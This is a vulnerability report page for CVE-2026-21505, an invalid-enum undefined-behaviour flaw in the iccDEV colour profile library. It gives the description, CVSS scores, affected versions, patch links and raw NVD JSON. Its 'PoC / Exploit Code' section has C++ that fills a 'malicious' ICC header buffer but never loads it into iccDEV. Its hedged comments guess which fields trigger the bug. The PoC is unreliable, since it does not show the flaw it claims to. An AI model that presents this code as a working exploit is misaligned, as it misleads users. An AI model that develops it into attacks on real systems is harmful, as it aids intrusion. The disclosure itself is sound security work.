Security Vulnerability Report
CVE-2026-21505 CVSS 5.5 MEDIUM

Published: 2026-01-07 18:15:55
Last Modified: 2026-01-12 16:35:09

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV has undefined behavior due to an invalid enum value. This issue has been patched in version 2.3.1.2.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
cpp
// CVE-2026-21505 PoC - Malformed ICC Profile Triggering Invalid Enum Value
// This PoC demonstrates the vulnerability in iccDEV < 2.3.1.2
// The vulnerability allows undefined behavior due to invalid enum value handling
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <cstring>

// ICC Profile Header Structure (simplified)
struct ICCProfileHeader {
    uint32_t size;                 // Profile size
    uint32_t cmmType;              // CMM signature
    uint32_t profileVersion;       // Profile version
    uint32_t profileClass;         // Device class
    uint32_t colorSpace;           // Color space
    uint32_t pcs;                  // PCS (Profile Connection Space)
    uint32_t creationDateTime[3];  // Creation date/time
    uint32_t signature;            // 'acsp' signature
    uint32_t primaryPlatform;      // Primary platform
    uint32_t profileFlags;         // Profile flags
    uint32_t manufacturer;         // Device manufacturer
    uint32_t model;                // Device model
    uint32_t deviceAttributes;     // Device attributes
    uint32_t renderingIntent;      // Rendering intent
    // ... other fields
};

// Malicious profile creator that triggers invalid enum value
unsigned char* createMaliciousICCProfile() {
    // Allocate buffer for ICC profile
    unsigned char* profile = new unsigned char[128];
    memset(profile, 0, 128);

    // Set valid header signature 'acsp'
    profile[36] = 'a';
    profile[37] = 'c';
    profile[38] = 's';
    profile[39] = 'p';

    // Set profile version to trigger edge case in enum handling
    // Version 0x05000000 or similar may cause invalid enum conversion
    profile[8] = 0x05;   // Major version
    profile[9] = 0x00;   // Minor version
    profile[10] = 0x00;  // Bug fix version
    profile[11] = 0x00;

    // Set color space to trigger enum handling path
    // Using a value that causes enum range issues in version parsing
    profile[16] = 0x00;
    profile[17] = 0x00;
    profile[18] = 0x00;
    profile[19] = 0x00;  // May cause invalid enum conversion

    return profile;
}

int main(int argc, char* argv[]) {
    printf("CVE-2026-21505 PoC - iccDEV Invalid Enum Value\n");
    printf("This PoC creates a malformed ICC profile that triggers\n");
    printf("undefined behavior in iccDEV < 2.3.1.2\n\n");

    unsigned char* maliciousProfile = createMaliciousICCProfile();

    // %p expects a void*, so cast the buffer pointer explicitly
    printf("Malicious ICC profile created at %p\n", static_cast<void*>(maliciousProfile));
    printf("Profile size: 128 bytes\n");
    printf("Header signature: acsp\n");
    printf("Profile version: 5.0.0 (triggers enum edge case)\n");

    printf("\nTo trigger vulnerability:\n");
    printf("1. Load this profile using iccDEV library < 2.3.1.2\n");
    printf("2. The library will attempt to convert version to enum\n");
    printf("3. Invalid enum value causes undefined behavior\n");
    printf("4. Result: Application crash or unpredictable behavior\n");

    delete[] maliciousProfile;
    return 0;
}

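References

https://github.com/InternationalColorConsortium/iccDEV/commit/3bbe2088b2796cf0aa4f7fa19f7ccd9ad1c7aba5 (Patch)
https://github.com/InternationalColorConsortium/iccDEV/commit/b1bb72fc3e9442ee1355aabae7314bb7d3fc9d41 (Patch)
https://github.com/InternationalColorConsortium/iccDEV/issues/361 (Exploit, Issue Tracking)
https://github.com/InternationalColorConsortium/iccDEV/pull/419 (Issue Tracking)
https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-j577-8285-qrf9 (Third Party Advisory)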

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21505", "sourceIdentifier": "[email protected]", "published": "2026-01-07T18:15:54.700", "lastModified": "2026-01-12T16:35:08.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV has undefined behavior due to an invalid enum value. This issue has been patched in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles ICC de gestión de color. Antes de la versión 2.3.1.2, iccDEV presenta un comportamiento indefinido debido a un valor de enumeración no válido. Este problema ha sido parcheado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-843"}]}, 
{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/3bbe2088b2796cf0aa4f7fa19f7ccd9ad1c7aba5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/b1bb72fc3e9442ee1355aabae7314bb7d3fc9d41", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/361", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/419", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-j577-8285-qrf9", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/361", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}